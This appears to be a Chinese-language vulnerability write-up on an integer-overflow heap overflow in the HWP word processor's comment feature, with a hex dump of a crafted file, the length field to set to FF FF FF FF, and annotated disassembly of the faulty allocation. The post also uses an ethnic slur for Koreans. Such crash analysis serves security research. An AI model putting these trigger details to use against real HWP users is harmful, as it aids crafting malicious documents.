HWP注释功能存在一个堆溢出,是因为长度变量经过计算后整数溢出,分配小内存拷贝大数据。
HWP是棒子用的WORD软件,懂的就懂了,不要问我怎么利用,好利用的话我会公布?
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000170 6F 63 04 10 00 00 00 00 00 00 00 00 00 00 47 04 oc............G. 00000180 50 06 6B 6E 75 25 01 80 00 00 00 29 00 4D 00 45 P.knu%.€...).M.E 00000190 00 4D 00 4F 00 2F 00 36 00 35 00 35 00 33 00 35 .M.O./.6.5.5.3.5 000001A0 00 2F 00 31 00 2F 00 33 00 38 00 31 00 37 00 32 ./.1./.3.8.1.7.2 000001B0 00 32 00 35 00 38 00 34 00 30 00 2F 00 33 00 30 .2.5.8.4.0./.3.0 000001C0 00 33 00 32 00 35 00 39 00 36 00 30 00 2F 00 69 .3.2.5.9.6.0./.i 000001D0 00 73 00 6E 00 6F 00 2F 00 5C 00 3B 00 3B 00 3D .s.n.o./.\.;.;.= 000001E0 2C 72 53 01 00 00 00 5D 04 40 00 01 00 00 00 48 ,rS....].@.....H 000001F0 04 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000200 00 00 00 42 04 80 01 14 27 00 80 00 00 00 00 0B ...B.€..'.€..... //这个14 27 00 80是下个块的长度,改成FF FF FF FF后会造成整数溢出,分配小内存然后拷贝大数据 00000210 00 0D 00 01 00 00 00 73 00 00 00 00 00 00 00 43 .......s.......C //73是注释的行数 00000220 08 F0 FF 28 4E 00 00 61 00 61 00 61 00 61 00 61 .?(N..a.a.a.a.a 00000230 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 .a.a.a.a.a.a.a.a 00000240 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 .a.a.a.a.a.a.a.a 00000250 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 .a.a.a.a.a.a.a.a 00000260 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 .a.a.a.a.a.a.a.a 00000270 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 .a.a.a.a.a.a.a.a 03205B3B 8B45 3C mov eax, dword ptr [ebp+3C] 03205B3E 0FB653 38 movzx edx, byte ptr [ebx+38] 03205B42 8B48 34 mov ecx, dword ptr [eax+34] 03205B45 3B91 C4020000 cmp edx, dword ptr [ecx+2C4] 03205B4B 7C 04 jl short 03205B51 03205B4D C643 38 00 mov byte ptr [ebx+38], 0 03205B51 8B4424 24 mov eax, dword ptr [esp+24] ; 下个块长度 03205B55 8063 39 0C and byte ptr [ebx+39], 0C 03205B59 85C0 test eax, eax 03205B5B 79 13 jns short 03205B70 03205B5D 8B4C24 54 mov ecx, dword ptr [esp+54] 03205B61 25 FFFFFF7F and eax, 7FFFFFFF ; 最大就是7fffffff 03205B66 894424 24 mov dword ptr [esp+24], eax 03205B6A C701 01000000 mov dword ptr [ecx], 1 03205B70 8B4C24 14 mov ecx, dword ptr [esp+14] 03205B74 66:85C9 test cx, cx 03205B77 74 09 je short 03205B82 03205B79 0FB7D1 movzx edx, cx 03205B7C 895424 54 mov dword ptr [esp+54], edx 03205B80 EB 08 jmp short 03205B8A 03205B82 C74424 54 01000>mov dword ptr [esp+54], 1 03205B8A 0FB74C24 28 movzx ecx, word ptr [esp+28] 03205B8F 0FB77C24 1C movzx edi, word ptr [esp+1C] 03205B94 6A 01 push 1 03205B96 51 push ecx 03205B97 894C24 58 mov dword ptr [esp+58], ecx 03205B9B 8B4C24 5C mov ecx, dword ptr [esp+5C] 03205B9F 51 push ecx 03205BA0 894424 48 mov dword ptr [esp+48], eax 03205BA4 50 push eax 03205BA5 8BC7 mov eax, edi 03205BA7 8BF3 mov esi, ebx 03205BA9 E8 42301B00 call 033B8BF0 ; 根据下个块的长度分配两块内存,填充相关结构 03205BAE 85C0 test eax, eax 03205BB0 74 2F je short 03205BE1 03205BB2 8B5424 50 mov edx, dword ptr [esp+50] 03205BB6 8B4424 54 mov eax, dword ptr [esp+54] 03205BBA 6A 20 push 20 03205BBC 6A 01 push 1 03205BBE 57 push edi 03205BBF 52 push edx 03205BC0 8B5424 4C mov edx, dword ptr [esp+4C] 03205BC4 50 push eax 03205BC5 E8 46331B00 call 033B8F10 ; 处理分配的两块内存,填上空格
分配算法:
033B8E5D 8B4C24 20 mov ecx, dword ptr [esp+20] 033B8E61 8BD8 mov ebx, eax 033B8E63 > 0FAF5C24 1C imul ebx, dword ptr [esp+1C] ; 73*60 033B8E68 8D3C7F lea edi, dword ptr [edi+edi*2] 033B8E6B 03FF add edi, edi 033B8E6D 03FF add edi, edi 033B8E6F 8D04CD 00000000 lea eax, dword ptr [ecx*8] 033B8E76 C1E8 02 shr eax, 2 033B8E79 C1EF 02 shr edi, 2 033B8E7C 03F8 add edi, eax 033B8E7E C1EB 02 shr ebx, 2 ; 73*60/2 033B8E81 03FB add edi, ebx 033B8E83 03FD add edi, ebp 033B8E85 8D14BD 00000000 lea edx, dword ptr [edi*4] 033B8E8C 52 push edx 033B8E8D 894424 20 mov dword ptr [esp+20], eax 033B8E91 FF15 88244003 call dword ptr [<&MSVCR90.malloc>] ; MSVCR90.malloc 033B8E97 83C4 04 add esp, 4 033B8E9A 8946 04 mov dword ptr [esi+4], eax 033B8E9D 85C0 test eax, eax 033B8E9F ^ 0F84 7EFEFFFF je 033B8D23 033B8EA5 8B4C24 1C mov ecx, dword ptr [esp+1C] 033B8EA9 03CB add ecx, ebx 033B8EAB 8D042B lea eax, dword ptr [ebx+ebp] ; 40000000+AC8 033B8EAE 8B5C24 24 mov ebx, dword ptr [esp+24] 033B8EB2 03CD add ecx, ebp 033B8EB4 896E 08 mov dword ptr [esi+8], ebp 033B8EB7 8946 0C mov dword ptr [esi+C], eax 033B8EBA 894E 10 mov dword ptr [esi+10], ecx 033B8EBD 83FB FF cmp ebx, -1 033B8EC0 75 0C jnz short 033B8ECE 033B8EC2 C74424 24 01000>mov dword ptr [esp+24], 1 033B8ECA 8B5C24 24 mov ebx, dword ptr [esp+24] 033B8ECE C1E3 04 shl ebx, 4 033B8ED1 C1EB 02 shr ebx, 2 033B8ED4 03DD add ebx, ebp 033B8ED6 8D149D 00000000 lea edx, dword ptr [ebx*4] ; 40000004*4=10--整数溢出 033B8EDD 52 push edx 033B8EDE FF15 88244003 call dword ptr [<&MSVCR90.malloc>] ; MSVCR90.malloc
留言评论(旧系统):